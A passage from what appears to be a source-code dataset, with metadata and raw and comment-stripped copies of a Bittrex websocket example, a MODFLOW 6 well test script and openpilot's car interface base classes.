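The steering line `curve1(Range180(s.a - s.av / 55, 1))` damps oscillation by steering toward where the relative angle will be a moment ahead, not where it is now. A self-contained sketch of that idea; `wrap_half_turns` and `clip` are hypothetical stand-ins for Util's `Range180` and `curve1`, whose exact shapes are not shown here:

def wrap_half_turns(x):
    # Wrap an angle expressed in half-turns into [-1, 1), like Range180(x, 1) presumably does.
    return (x + 1) % 2 - 1

def clip(x, lo=-1.0, hi=1.0):
    return max(lo, min(hi, x))

def steer(angle_half_turns, angular_velocity):
    # Lead the angle by ~1/55 s of rotation so the controller eases off before overshooting.
    return clip(wrap_half_turns(angle_half_turns - angular_velocity / 55))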
| true | true |
f7078e8537d57e0975183b3c74fcab4086d16eb4 | 650 | py | Python | bittrex_websocket/summary_state.py | ericsomdahl/python-bittrex-websocket | 6c8982dd48fac4f4c94cceaaf05b0c90ec8357e0 | ["MIT"] | 2 | 2017-12-03T08:16:32.000Z | 2018-12-02T09:00:25.000Z | bittrex_websocket/summary_state.py | ericsomdahl/python-bittrex-websocket | 6c8982dd48fac4f4c94cceaaf05b0c90ec8357e0 | ["MIT"] | null | null | null | bittrex_websocket/summary_state.py | ericsomdahl/python-bittrex-websocket | 6c8982dd48fac4f4c94cceaaf05b0c90ec8357e0 | ["MIT"] | 3 | 2018-01-09T03:12:51.000Z | 2020-07-10T23:54:36.000Z |
#!/usr/bin/python
# -*- coding: utf-8 -*-

# bittrex_websocket/summary_state.py
# Stanislav Lazarov

from time import sleep

from bittrex_websocket.websocket_client import BittrexSocket

if __name__ == "__main__":
    class MyBittrexSocket(BittrexSocket):
        def on_open(self):
            self.client_callbacks = ['updateSummaryState']

        def on_debug(self, **kwargs):
            pass

        def on_message(self, *args, **kwargs):
            print(args)

    tickers = ['BTC-ETH', 'ETH-1ST', 'BTC-1ST', 'BTC-NEO', 'ETH-NEO']
    ws = MyBittrexSocket(tickers)
    ws.run()
    for i in list(range(10)):
        sleep(1)
    ws.stop()
| 22.413793 | 69 | 0.621538 |
from time import sleep

from bittrex_websocket.websocket_client import BittrexSocket

if __name__ == "__main__":
    class MyBittrexSocket(BittrexSocket):
        def on_open(self):
            self.client_callbacks = ['updateSummaryState']

        def on_debug(self, **kwargs):
            pass

        def on_message(self, *args, **kwargs):
            print(args)

    tickers = ['BTC-ETH', 'ETH-1ST', 'BTC-1ST', 'BTC-NEO', 'ETH-NEO']
    ws = MyBittrexSocket(tickers)
    ws.run()
    for i in list(range(10)):
        sleep(1)
    ws.stop()
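A sketch of a variant that accumulates the summary messages instead of printing them. It relies only on the hooks the sample itself uses (on_open, on_message, run, stop) and is untested against the real client; the `messages` buffer is a hypothetical addition:

from time import sleep
from bittrex_websocket.websocket_client import BittrexSocket

class CollectingBittrexSocket(BittrexSocket):
    def on_open(self):
        self.client_callbacks = ['updateSummaryState']
        self.messages = []  # hypothetical buffer for received payloads

    def on_message(self, *args, **kwargs):
        self.messages.append(args)

ws = CollectingBittrexSocket(['BTC-ETH'])
ws.run()
sleep(10)
ws.stop()
print(len(ws.messages), "summary updates received")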
| true | true |
f7078e9519a8851ed45a7599f584a6bcaa1ad9db | 7,948 | py | Python | autotest/test_gwf_maw04.py | kzeiler/modflow6 | a185d95b91985e965f8a04ae353305dff19b9637 | ["CC0-1.0"] | null | null | null | autotest/test_gwf_maw04.py | kzeiler/modflow6 | a185d95b91985e965f8a04ae353305dff19b9637 | ["CC0-1.0"] | null | null | null | autotest/test_gwf_maw04.py | kzeiler/modflow6 | a185d95b91985e965f8a04ae353305dff19b9637 | ["CC0-1.0"] | null | null | null |
import os
import pytest
import sys
import numpy as np

try:
    import pymake
except:
    msg = "Error. Pymake package is not available.\n"
    msg += "Try installing using the following command:\n"
    msg += " pip install https://github.com/modflowpy/pymake/zipball/master"
    raise Exception(msg)

try:
    import flopy
except:
    msg = "Error. FloPy package is not available.\n"
    msg += "Try installing using the following command:\n"
    msg += " pip install flopy"
    raise Exception(msg)

from framework import testing_framework, running_on_CI
from simulation import Simulation

ex = [
    "maw_iss305a",
    "maw_iss305b",
    "maw_iss305c",
    "maw_iss305d",
    "maw_iss305e",
    "maw_iss305f",
]
exdirs = []
for s in ex:
    exdirs.append(os.path.join("temp", s))
ddir = "data"
cmppth = "mf2005"

paktest = "maw"

require_failure = [True for i in range(len(exdirs))]
require_failure[0] = False

# set travis to True when version 1.13.0 is released
continuous_integration = [True for n in ex]

# set replace_exe to None to use default executable
replace_exe = None

# temporal discretization
nper = 2
perlen = [0.0, 365.0]
nstp = [1, 25]
tsmult = [1.0, 1.1]
steady = [True, False]

# spatial discretization
nlay, nrow, ncol = 2, 101, 101
shape3d = (nlay, nrow, ncol)
size3d = nlay * nrow * ncol

xlen = 1000.0
common_ratio = 1.01
nhalf = int(0.5 * ncol) + 1
first_term = 0.5 * xlen / ((1 - common_ratio**nhalf) / (1 - common_ratio))
delr = np.zeros((ncol), dtype=float)
for n in range(nhalf):
    if n == 0:
        v = first_term
    else:
        v = first_term * common_ratio**n
    delr[nhalf + n - 1] = v
delr[: nhalf - 1] = delr[-1 : nhalf - 1 : -1]

# add error to edge cells
err = xlen - delr.sum()
delr[0] += 0.5 * err
delr[-1] += 0.5 * err

top = 0.0
botm = [-175, -350.0]
strt = 0.0

# hydraulic data
hk = 1.0
ss = 1e-5
confined = 0

chd_spd = []
chd5_spd = []
for i in range(nrow):
    if i == 0 or i == ncol - 1:
        for j in range(ncol):
            chd_spd.append([(0, i, j), strt])
            chd5_spd.append([0, i, j, strt, strt])
    else:
        chd_spd.append([(0, i, 0), strt])
        chd_spd.append([(0, i, ncol - 1), strt])
        chd5_spd.append([0, i, 0, strt, strt])
        chd5_spd.append([0, i, ncol - 1, strt, strt])

# maw data
radius0 = np.sqrt(delr[nhalf] * delr[nhalf] / (8.0 * np.pi))
radius = 0.25
sradius0 = radius + 0.1
wellq = -100.0
skin_mult = [0.1, 10.0, 1.0, 0.0, -1.0, 100.0]
condeqn = ["CUMULATIVE", "SKIN", "SKIN", "SKIN", "SPECIFIED", "CUMULATIVE"]
sradius = [sradius0, sradius0, sradius0, sradius0, sradius0, radius0 * 1.5]

tdis_rc = []
for idx in range(nper):
    tdis_rc.append((perlen[idx], nstp[idx], tsmult[idx]))

hclose, rclose = 1e-9, 1e-6


def build_model(idx, dir):
    name = ex[idx]
    ws = dir

    # build MODFLOW 6 files
    sim = flopy.mf6.MFSimulation(
        sim_name=name, version="mf6", exe_name="mf6", sim_ws=ws
    )
    # create tdis package
    tdis = flopy.mf6.ModflowTdis(
        sim, time_units="DAYS", nper=nper, perioddata=tdis_rc
    )
    # create iterative model solution
    ims = flopy.mf6.ModflowIms(
        sim, inner_dvclose=hclose, rcloserecord=rclose, outer_dvclose=hclose
    )
    # create gwf model
    gwf = flopy.mf6.ModflowGwf(sim, modelname=name, save_flows=True)
    # discretization
    dis = flopy.mf6.ModflowGwfdis(
        gwf,
        nlay=nlay,
        nrow=nrow,
        ncol=ncol,
        delr=delr,
        delc=delr,
        top=top,
        botm=botm,
    )
    # initial conditions
    ic = flopy.mf6.ModflowGwfic(gwf, strt=strt)
    # node property flow
    npf = flopy.mf6.ModflowGwfnpf(
        gwf, save_flows=False, icelltype=confined, k=hk
    )
    # storage
    sto = flopy.mf6.ModflowGwfsto(
        gwf,
        save_flows=False,
        iconvert=confined,
        ss=ss,
        steady_state={0: True},
        transient={1: True},
    )
    # constant head
    chd = flopy.mf6.ModflowGwfchd(
        gwf, stress_period_data=chd_spd, save_flows=False
    )
    # multi-aquifer well
    hks = hk * skin_mult[idx]
    mpd = [[0, radius, botm[-1], strt, condeqn[idx], 2]]
    mcd = [
        [0, 0, (0, nhalf, nhalf), top, botm[0], hks, sradius[idx]],
        [0, 1, (1, nhalf, nhalf), botm[0], botm[1], hks, sradius[idx]],
    ]
    perioddata = {1: [[0, "RATE", wellq]]}
    maw = flopy.mf6.ModflowGwfmaw(
        gwf,
        print_input=True,
        no_well_storage=True,
        packagedata=mpd,
        connectiondata=mcd,
        perioddata=perioddata,
    )
    # output control
    oc = flopy.mf6.ModflowGwfoc(
        gwf,
        budget_filerecord="{}.cbc".format(name),
        head_filerecord="{}.hds".format(name),
        saverecord=[("HEAD", "ALL"), ("BUDGET", "ALL")],
    )

    # build MODFLOW-2005 files
    if require_failure[idx]:
        mc = None
    else:
        ws = os.path.join(dir, cmppth)
        mc = flopy.modflow.Modflow(name, model_ws=ws, version=cmppth)
        dis = flopy.modflow.ModflowDis(
            mc,
            nlay=nlay,
            nrow=nrow,
            ncol=ncol,
            nper=nper,
            perlen=perlen,
            nstp=nstp,
            tsmult=tsmult,
            steady=steady,
            delr=delr,
            delc=delr,
            top=top,
            botm=botm,
        )
        bas = flopy.modflow.ModflowBas(mc, strt=strt)
        lpf = flopy.modflow.ModflowLpf(
            mc, laytyp=confined, hk=hk, vka=hk, ss=ss, sy=0
        )
        chd = flopy.modflow.ModflowChd(mc, stress_period_data=chd5_spd)
        # mnw2
        # empty mnw2 file to create recarrays
        mnw2 = flopy.modflow.ModflowMnw2(mc)
        node_data = mnw2.get_empty_node_data(2)
        node_data["ztop"] = np.array([top, botm[0]])
        node_data["zbotm"] = np.array([botm[0], botm[1]])
        node_data["i"] = np.array([nhalf, nhalf])
        node_data["j"] = np.array([nhalf, nhalf])
        node_data["wellid"] = np.array(["well1", "well1"])
        node_data["losstype"] = np.array(["skin", "skin"])
        node_data["rw"] = np.array([radius, radius])
        node_data["rskin"] = np.array([sradius[idx], sradius[idx]])
        node_data["kskin"] = np.array([hks, hks])
        dtype = [("wellid", np.unicode_, 20), ("qdes", "<f8")]
        spd0 = np.zeros(1, dtype=dtype)
        spd0["wellid"] = "well1"
        spd1 = np.zeros(1, dtype=dtype)
        spd1["wellid"] = "well1"
        spd1["qdes"] = wellq
        spd = {0: spd0, 1: spd1}
        mnw2 = flopy.modflow.ModflowMnw2(
            mc,
            mnwmax=1,
            node_data=node_data,
            stress_period_data=spd,
            itmp=[1, 1],
            mnwprnt=2,
        )
        oc = flopy.modflow.ModflowOc(
            mc,
            stress_period_data=None,
            save_every=1,
            save_types=["save head", "save budget"],
        )
        pcg = flopy.modflow.ModflowPcg(mc, hclose=hclose, rclose=rclose)

    return sim, mc


# - No need to change any code below


@pytest.mark.parametrize(
    "idx, dir",
    list(enumerate(exdirs)),
)
def test_mf6model(idx, dir):
    # determine if running on CI infrastructure
    is_CI = running_on_CI()

    # initialize testing framework
    test = testing_framework()

    # build the models
    test.build_mf6_models_legacy(build_model, idx, dir)

    # run the test model
    if is_CI and not continuous_integration[idx]:
        return
    test.run_mf6(Simulation(dir, require_failure=require_failure[idx]))


def main():
    # initialize testing framework
    test = testing_framework()

    # build the models
    # run the test model
    for idx, dir in enumerate(exdirs):
        test.build_mf6_models_legacy(build_model, idx, dir)
        sim = Simulation(dir, require_failure=require_failure[idx])
        test.run_mf6(sim)

    return


if __name__ == "__main__":
    # print message
    print("standalone run of {}".format(os.path.basename(__file__)))

    # run main routine
    main()
| 26.58194 | 76 | 0.589834 |
import os
import pytest
import sys
import numpy as np

try:
    import pymake
except:
    msg = "Error. Pymake package is not available.\n"
    msg += "Try installing using the following command:\n"
    msg += " pip install https://github.com/modflowpy/pymake/zipball/master"
    raise Exception(msg)

try:
    import flopy
except:
    msg = "Error. FloPy package is not available.\n"
    msg += "Try installing using the following command:\n"
    msg += " pip install flopy"
    raise Exception(msg)

from framework import testing_framework, running_on_CI
from simulation import Simulation

ex = [
    "maw_iss305a",
    "maw_iss305b",
    "maw_iss305c",
    "maw_iss305d",
    "maw_iss305e",
    "maw_iss305f",
]
exdirs = []
for s in ex:
    exdirs.append(os.path.join("temp", s))
ddir = "data"
cmppth = "mf2005"

paktest = "maw"

require_failure = [True for i in range(len(exdirs))]
require_failure[0] = False

continuous_integration = [True for n in ex]

replace_exe = None

nper = 2
perlen = [0.0, 365.0]
nstp = [1, 25]
tsmult = [1.0, 1.1]
steady = [True, False]

nlay, nrow, ncol = 2, 101, 101
shape3d = (nlay, nrow, ncol)
size3d = nlay * nrow * ncol

xlen = 1000.0
common_ratio = 1.01
nhalf = int(0.5 * ncol) + 1
first_term = 0.5 * xlen / ((1 - common_ratio**nhalf) / (1 - common_ratio))
delr = np.zeros((ncol), dtype=float)
for n in range(nhalf):
    if n == 0:
        v = first_term
    else:
        v = first_term * common_ratio**n
    delr[nhalf + n - 1] = v
delr[: nhalf - 1] = delr[-1 : nhalf - 1 : -1]

err = xlen - delr.sum()
delr[0] += 0.5 * err
delr[-1] += 0.5 * err

top = 0.0
botm = [-175, -350.0]
strt = 0.0

hk = 1.0
ss = 1e-5
confined = 0

chd_spd = []
chd5_spd = []
for i in range(nrow):
    if i == 0 or i == ncol - 1:
        for j in range(ncol):
            chd_spd.append([(0, i, j), strt])
            chd5_spd.append([0, i, j, strt, strt])
    else:
        chd_spd.append([(0, i, 0), strt])
        chd_spd.append([(0, i, ncol - 1), strt])
        chd5_spd.append([0, i, 0, strt, strt])
        chd5_spd.append([0, i, ncol - 1, strt, strt])

radius0 = np.sqrt(delr[nhalf] * delr[nhalf] / (8.0 * np.pi))
radius = 0.25
sradius0 = radius + 0.1
wellq = -100.0
skin_mult = [0.1, 10.0, 1.0, 0.0, -1.0, 100.0]
condeqn = ["CUMULATIVE", "SKIN", "SKIN", "SKIN", "SPECIFIED", "CUMULATIVE"]
sradius = [sradius0, sradius0, sradius0, sradius0, sradius0, radius0 * 1.5]

tdis_rc = []
for idx in range(nper):
    tdis_rc.append((perlen[idx], nstp[idx], tsmult[idx]))

hclose, rclose = 1e-9, 1e-6


def build_model(idx, dir):
    name = ex[idx]
    ws = dir

    sim = flopy.mf6.MFSimulation(
        sim_name=name, version="mf6", exe_name="mf6", sim_ws=ws
    )
    tdis = flopy.mf6.ModflowTdis(
        sim, time_units="DAYS", nper=nper, perioddata=tdis_rc
    )
    ims = flopy.mf6.ModflowIms(
        sim, inner_dvclose=hclose, rcloserecord=rclose, outer_dvclose=hclose
    )
    gwf = flopy.mf6.ModflowGwf(sim, modelname=name, save_flows=True)
    dis = flopy.mf6.ModflowGwfdis(
        gwf,
        nlay=nlay,
        nrow=nrow,
        ncol=ncol,
        delr=delr,
        delc=delr,
        top=top,
        botm=botm,
    )
    ic = flopy.mf6.ModflowGwfic(gwf, strt=strt)
    npf = flopy.mf6.ModflowGwfnpf(
        gwf, save_flows=False, icelltype=confined, k=hk
    )
    sto = flopy.mf6.ModflowGwfsto(
        gwf,
        save_flows=False,
        iconvert=confined,
        ss=ss,
        steady_state={0: True},
        transient={1: True},
    )
    chd = flopy.mf6.ModflowGwfchd(
        gwf, stress_period_data=chd_spd, save_flows=False
    )
    hks = hk * skin_mult[idx]
    mpd = [[0, radius, botm[-1], strt, condeqn[idx], 2]]
    mcd = [
        [0, 0, (0, nhalf, nhalf), top, botm[0], hks, sradius[idx]],
        [0, 1, (1, nhalf, nhalf), botm[0], botm[1], hks, sradius[idx]],
    ]
    perioddata = {1: [[0, "RATE", wellq]]}
    maw = flopy.mf6.ModflowGwfmaw(
        gwf,
        print_input=True,
        no_well_storage=True,
        packagedata=mpd,
        connectiondata=mcd,
        perioddata=perioddata,
    )
    oc = flopy.mf6.ModflowGwfoc(
        gwf,
        budget_filerecord="{}.cbc".format(name),
        head_filerecord="{}.hds".format(name),
        saverecord=[("HEAD", "ALL"), ("BUDGET", "ALL")],
    )

    if require_failure[idx]:
        mc = None
    else:
        ws = os.path.join(dir, cmppth)
        mc = flopy.modflow.Modflow(name, model_ws=ws, version=cmppth)
        dis = flopy.modflow.ModflowDis(
            mc,
            nlay=nlay,
            nrow=nrow,
            ncol=ncol,
            nper=nper,
            perlen=perlen,
            nstp=nstp,
            tsmult=tsmult,
            steady=steady,
            delr=delr,
            delc=delr,
            top=top,
            botm=botm,
        )
        bas = flopy.modflow.ModflowBas(mc, strt=strt)
        lpf = flopy.modflow.ModflowLpf(
            mc, laytyp=confined, hk=hk, vka=hk, ss=ss, sy=0
        )
        chd = flopy.modflow.ModflowChd(mc, stress_period_data=chd5_spd)
        mnw2 = flopy.modflow.ModflowMnw2(mc)
        node_data = mnw2.get_empty_node_data(2)
        node_data["ztop"] = np.array([top, botm[0]])
        node_data["zbotm"] = np.array([botm[0], botm[1]])
        node_data["i"] = np.array([nhalf, nhalf])
        node_data["j"] = np.array([nhalf, nhalf])
        node_data["wellid"] = np.array(["well1", "well1"])
        node_data["losstype"] = np.array(["skin", "skin"])
        node_data["rw"] = np.array([radius, radius])
        node_data["rskin"] = np.array([sradius[idx], sradius[idx]])
        node_data["kskin"] = np.array([hks, hks])
        dtype = [("wellid", np.unicode_, 20), ("qdes", "<f8")]
        spd0 = np.zeros(1, dtype=dtype)
        spd0["wellid"] = "well1"
        spd1 = np.zeros(1, dtype=dtype)
        spd1["wellid"] = "well1"
        spd1["qdes"] = wellq
        spd = {0: spd0, 1: spd1}
        mnw2 = flopy.modflow.ModflowMnw2(
            mc,
            mnwmax=1,
            node_data=node_data,
            stress_period_data=spd,
            itmp=[1, 1],
            mnwprnt=2,
        )
        oc = flopy.modflow.ModflowOc(
            mc,
            stress_period_data=None,
            save_every=1,
            save_types=["save head", "save budget"],
        )
        pcg = flopy.modflow.ModflowPcg(mc, hclose=hclose, rclose=rclose)

    return sim, mc


@pytest.mark.parametrize(
    "idx, dir",
    list(enumerate(exdirs)),
)
def test_mf6model(idx, dir):
    is_CI = running_on_CI()

    test = testing_framework()

    test.build_mf6_models_legacy(build_model, idx, dir)

    if is_CI and not continuous_integration[idx]:
        return
    test.run_mf6(Simulation(dir, require_failure=require_failure[idx]))


def main():
    test = testing_framework()

    for idx, dir in enumerate(exdirs):
        test.build_mf6_models_legacy(build_model, idx, dir)
        sim = Simulation(dir, require_failure=require_failure[idx])
        test.run_mf6(sim)

    return


if __name__ == "__main__":
    print("standalone run of {}".format(os.path.basename(__file__)))
    main()
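The variable-width grid in this test is a geometric series: first_term is chosen so that nhalf cells with common ratio 1.01 sum to half of xlen, i.e. a(1 - r^n)/(1 - r) = xlen/2. A small standalone check of that property (only numpy assumed); the leftover floating-point error is exactly what the test folds into the two edge cells:

import numpy as np

xlen, r, n = 1000.0, 1.01, 51  # n = int(0.5 * 101) + 1 cells per half-width
a = 0.5 * xlen / ((1 - r**n) / (1 - r))  # first term of the geometric series

widths = a * r ** np.arange(n)
# The half-grid sums to xlen / 2 up to rounding, so the full grid sums to xlen.
print(widths.sum())  # ~500.0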
| true | true |
f7078ed238233ef19cc666f9050de7d121c9cc2d | 6,652 | py | Python | selfdrive/car/interfaces.py | Neptos/openpilot | 01914a1a91ade18bd7aead99e7d1bf38cd22ad89 | ["MIT"] | 5 | 2020-12-26T17:21:31.000Z | 2021-05-11T23:09:10.000Z | selfdrive/car/interfaces.py | Neptos/openpilot | 01914a1a91ade18bd7aead99e7d1bf38cd22ad89 | ["MIT"] | 1 | 2021-02-03T00:51:55.000Z | 2021-02-03T00:51:55.000Z | selfdrive/car/interfaces.py | Neptos/openpilot | 01914a1a91ade18bd7aead99e7d1bf38cd22ad89 | ["MIT"] | 11 | 2020-12-26T17:44:42.000Z | 2021-04-06T19:59:25.000Z |
import os
import time
from cereal import car
from common.kalman.simple_kalman import KF1D
from common.realtime import DT_CTRL
from selfdrive.car import gen_empty_fingerprint
from selfdrive.config import Conversions as CV
from selfdrive.controls.lib.events import Events
from selfdrive.controls.lib.vehicle_model import VehicleModel
from selfdrive.controls.lib.drive_helpers import V_CRUISE_MAX

GearShifter = car.CarState.GearShifter
EventName = car.CarEvent.EventName

MAX_CTRL_SPEED = (V_CRUISE_MAX + 4) * CV.KPH_TO_MS  # 144 + 4 = 92 mph


# generic car and radar interfaces
class CarInterfaceBase():
  def __init__(self, CP, CarController, CarState):
    self.CP = CP
    self.VM = VehicleModel(CP)

    self.frame = 0
    self.low_speed_alert = False

    if CarState is not None:
      self.CS = CarState(CP)
      self.cp = self.CS.get_can_parser(CP)
      self.cp_cam = self.CS.get_cam_can_parser(CP)
      self.cp_body = self.CS.get_body_can_parser(CP)

    self.CC = None
    if CarController is not None:
      self.CC = CarController(self.cp.dbc_name, CP, self.VM)

  @staticmethod
  def calc_accel_override(a_ego, a_target, v_ego, v_target):
    return 1.

  @staticmethod
  def compute_gb(accel, speed):
    raise NotImplementedError

  @staticmethod
  def get_params(candidate, fingerprint=gen_empty_fingerprint(), car_fw=None):
    raise NotImplementedError

  # returns a set of default params to avoid repetition in car specific params
  @staticmethod
  def get_std_params(candidate, fingerprint):
    ret = car.CarParams.new_message()
    ret.carFingerprint = candidate
    ret.isPandaBlack = True  # TODO: deprecate this field

    # standard ALC params
    ret.steerControlType = car.CarParams.SteerControlType.torque
    ret.steerMaxBP = [0.]
    ret.steerMaxV = [1.]
    ret.minSteerSpeed = 0.

    # stock ACC by default
    ret.enableCruise = True
    ret.minEnableSpeed = -1.  # enable is done by stock ACC, so ignore this
    ret.steerRatioRear = 0.  # no rear steering, at least on the listed cars above
    ret.gasMaxBP = [0.]
    ret.gasMaxV = [.5]  # half max brake
    ret.brakeMaxBP = [0.]
    ret.brakeMaxV = [1.]
    ret.openpilotLongitudinalControl = False
    ret.startAccel = 0.0
    ret.stoppingControl = False
    ret.longitudinalTuning.deadzoneBP = [0.]
    ret.longitudinalTuning.deadzoneV = [0.]
    ret.longitudinalTuning.kpBP = [0.]
    ret.longitudinalTuning.kpV = [1.]
    ret.longitudinalTuning.kiBP = [0.]
    ret.longitudinalTuning.kiV = [1.]
    return ret

  # returns a car.CarState, pass in car.CarControl
  def update(self, c, can_strings):
    raise NotImplementedError

  # return sendcan, pass in a car.CarControl
  def apply(self, c):
    raise NotImplementedError

  def create_common_events(self, cs_out, extra_gears=[], gas_resume_speed=-1, pcm_enable=True):  # pylint: disable=dangerous-default-value
    events = Events()

    if cs_out.doorOpen:
      events.add(EventName.doorOpen)
    if cs_out.seatbeltUnlatched:
      events.add(EventName.seatbeltNotLatched)
    if cs_out.gearShifter != GearShifter.drive and cs_out.gearShifter not in extra_gears:
      events.add(EventName.wrongGear)
    if cs_out.gearShifter == GearShifter.reverse:
      events.add(EventName.reverseGear)
    if not cs_out.cruiseState.available:
      events.add(EventName.wrongCarMode)
    if cs_out.espDisabled:
      events.add(EventName.espDisabled)
    if cs_out.gasPressed:
      events.add(EventName.gasPressed)
    if cs_out.stockFcw:
      events.add(EventName.stockFcw)
    if cs_out.stockAeb:
      events.add(EventName.stockAeb)
    if cs_out.vEgo > MAX_CTRL_SPEED:
      events.add(EventName.speedTooHigh)
    if cs_out.cruiseState.nonAdaptive:
      events.add(EventName.wrongCruiseMode)

    if cs_out.steerError:
      events.add(EventName.steerUnavailable)
    elif cs_out.steerWarning:
      events.add(EventName.steerTempUnavailable)

    # Disable on rising edge of gas or brake. Also disable on brake when speed > 0.
    # Optionally allow to press gas at zero speed to resume.
    # e.g. Chrysler does not spam the resume button yet, so resuming with gas is handy. FIXME!
    if (cs_out.gasPressed and (not self.CS.out.gasPressed) and cs_out.vEgo > gas_resume_speed) or \
       (cs_out.brakePressed and (not self.CS.out.brakePressed or not cs_out.standstill)):
      events.add(EventName.pedalPressed)

    # we engage when pcm is active (rising edge)
    if pcm_enable:
      if cs_out.cruiseState.enabled and not self.CS.out.cruiseState.enabled:
        events.add(EventName.pcmEnable)
      elif not cs_out.cruiseState.enabled:
        events.add(EventName.pcmDisable)

    return events


class RadarInterfaceBase():
  def __init__(self, CP):
    self.pts = {}
    self.delay = 0
    self.radar_ts = CP.radarTimeStep
    self.no_radar_sleep = 'NO_RADAR_SLEEP' in os.environ

  def update(self, can_strings):
    ret = car.RadarData.new_message()
    if not self.no_radar_sleep:
      time.sleep(self.radar_ts)  # radard runs on RI updates
    return ret


class CarStateBase:
  def __init__(self, CP):
    self.CP = CP
    self.car_fingerprint = CP.carFingerprint
    self.out = car.CarState.new_message()

    self.cruise_buttons = 0
    self.left_blinker_cnt = 0
    self.right_blinker_cnt = 0

    # Q = np.matrix([[10.0, 0.0], [0.0, 100.0]])
    # R = 1e3
    self.v_ego_kf = KF1D(x0=[[0.0], [0.0]],
                         A=[[1.0, DT_CTRL], [0.0, 1.0]],
                         C=[1.0, 0.0],
                         K=[[0.12287673], [0.29666309]])

  def update_speed_kf(self, v_ego_raw):
    if abs(v_ego_raw - self.v_ego_kf.x[0][0]) > 2.0:  # Prevent large accelerations when car starts at non zero speed
      self.v_ego_kf.x = [[v_ego_raw], [0.0]]

    v_ego_x = self.v_ego_kf.update(v_ego_raw)
    return float(v_ego_x[0]), float(v_ego_x[1])

  def update_blinker(self, blinker_time: int, left_blinker_lamp: bool, right_blinker_lamp: bool):
    self.left_blinker_cnt = blinker_time if left_blinker_lamp else max(self.left_blinker_cnt - 1, 0)
    self.right_blinker_cnt = blinker_time if right_blinker_lamp else max(self.right_blinker_cnt - 1, 0)
    return self.left_blinker_cnt > 0, self.right_blinker_cnt > 0

  @staticmethod
  def parse_gear_shifter(gear):
    return {'P': GearShifter.park, 'R': GearShifter.reverse, 'N': GearShifter.neutral,
            'E': GearShifter.eco, 'T': GearShifter.manumatic, 'D': GearShifter.drive,
            'S': GearShifter.sport, 'L': GearShifter.low, 'B': GearShifter.brake}.get(gear, GearShifter.unknown)

  @staticmethod
  def get_cam_can_parser(CP):
    return None

  @staticmethod
  def get_body_can_parser(CP):
    return None
| 35.010526 | 138 | 0.704299 |
import os
import time
from cereal import car
from common.kalman.simple_kalman import KF1D
from common.realtime import DT_CTRL
from selfdrive.car import gen_empty_fingerprint
from selfdrive.config import Conversions as CV
from selfdrive.controls.lib.events import Events
from selfdrive.controls.lib.vehicle_model import VehicleModel
from selfdrive.controls.lib.drive_helpers import V_CRUISE_MAX

GearShifter = car.CarState.GearShifter
EventName = car.CarEvent.EventName

MAX_CTRL_SPEED = (V_CRUISE_MAX + 4) * CV.KPH_TO_MS


class CarInterfaceBase():
  def __init__(self, CP, CarController, CarState):
    self.CP = CP
    self.VM = VehicleModel(CP)

    self.frame = 0
    self.low_speed_alert = False

    if CarState is not None:
      self.CS = CarState(CP)
      self.cp = self.CS.get_can_parser(CP)
      self.cp_cam = self.CS.get_cam_can_parser(CP)
      self.cp_body = self.CS.get_body_can_parser(CP)

    self.CC = None
    if CarController is not None:
      self.CC = CarController(self.cp.dbc_name, CP, self.VM)

  @staticmethod
  def calc_accel_override(a_ego, a_target, v_ego, v_target):
    return 1.

  @staticmethod
  def compute_gb(accel, speed):
    raise NotImplementedError

  @staticmethod
  def get_params(candidate, fingerprint=gen_empty_fingerprint(), car_fw=None):
    raise NotImplementedError

  @staticmethod
  def get_std_params(candidate, fingerprint):
    ret = car.CarParams.new_message()
    ret.carFingerprint = candidate
    ret.isPandaBlack = True
    ret.steerControlType = car.CarParams.SteerControlType.torque
    ret.steerMaxBP = [0.]
    ret.steerMaxV = [1.]
    ret.minSteerSpeed = 0.
    ret.enableCruise = True
    ret.minEnableSpeed = -1.
    ret.steerRatioRear = 0.
    ret.gasMaxBP = [0.]
    ret.gasMaxV = [.5]
    ret.brakeMaxBP = [0.]
    ret.brakeMaxV = [1.]
    ret.openpilotLongitudinalControl = False
    ret.startAccel = 0.0
    ret.stoppingControl = False
    ret.longitudinalTuning.deadzoneBP = [0.]
    ret.longitudinalTuning.deadzoneV = [0.]
    ret.longitudinalTuning.kpBP = [0.]
    ret.longitudinalTuning.kpV = [1.]
    ret.longitudinalTuning.kiBP = [0.]
    ret.longitudinalTuning.kiV = [1.]
    return ret

  def update(self, c, can_strings):
    raise NotImplementedError

  def apply(self, c):
    raise NotImplementedError

  def create_common_events(self, cs_out, extra_gears=[], gas_resume_speed=-1, pcm_enable=True):
    events = Events()

    if cs_out.doorOpen:
      events.add(EventName.doorOpen)
    if cs_out.seatbeltUnlatched:
      events.add(EventName.seatbeltNotLatched)
    if cs_out.gearShifter != GearShifter.drive and cs_out.gearShifter not in extra_gears:
      events.add(EventName.wrongGear)
    if cs_out.gearShifter == GearShifter.reverse:
      events.add(EventName.reverseGear)
    if not cs_out.cruiseState.available:
      events.add(EventName.wrongCarMode)
    if cs_out.espDisabled:
      events.add(EventName.espDisabled)
    if cs_out.gasPressed:
      events.add(EventName.gasPressed)
    if cs_out.stockFcw:
      events.add(EventName.stockFcw)
    if cs_out.stockAeb:
      events.add(EventName.stockAeb)
    if cs_out.vEgo > MAX_CTRL_SPEED:
      events.add(EventName.speedTooHigh)
    if cs_out.cruiseState.nonAdaptive:
      events.add(EventName.wrongCruiseMode)

    if cs_out.steerError:
      events.add(EventName.steerUnavailable)
    elif cs_out.steerWarning:
      events.add(EventName.steerTempUnavailable)

    if (cs_out.gasPressed and (not self.CS.out.gasPressed) and cs_out.vEgo > gas_resume_speed) or \
       (cs_out.brakePressed and (not self.CS.out.brakePressed or not cs_out.standstill)):
      events.add(EventName.pedalPressed)

    if pcm_enable:
      if cs_out.cruiseState.enabled and not self.CS.out.cruiseState.enabled:
        events.add(EventName.pcmEnable)
      elif not cs_out.cruiseState.enabled:
        events.add(EventName.pcmDisable)

    return events


class RadarInterfaceBase():
  def __init__(self, CP):
    self.pts = {}
    self.delay = 0
    self.radar_ts = CP.radarTimeStep
    self.no_radar_sleep = 'NO_RADAR_SLEEP' in os.environ

  def update(self, can_strings):
    ret = car.RadarData.new_message()
    if not self.no_radar_sleep:
      time.sleep(self.radar_ts)
    return ret


class CarStateBase:
  def __init__(self, CP):
    self.CP = CP
    self.car_fingerprint = CP.carFingerprint
    self.out = car.CarState.new_message()

    self.cruise_buttons = 0
    self.left_blinker_cnt = 0
    self.right_blinker_cnt = 0

    self.v_ego_kf = KF1D(x0=[[0.0], [0.0]],
                         A=[[1.0, DT_CTRL], [0.0, 1.0]],
                         C=[1.0, 0.0],
                         K=[[0.12287673], [0.29666309]])

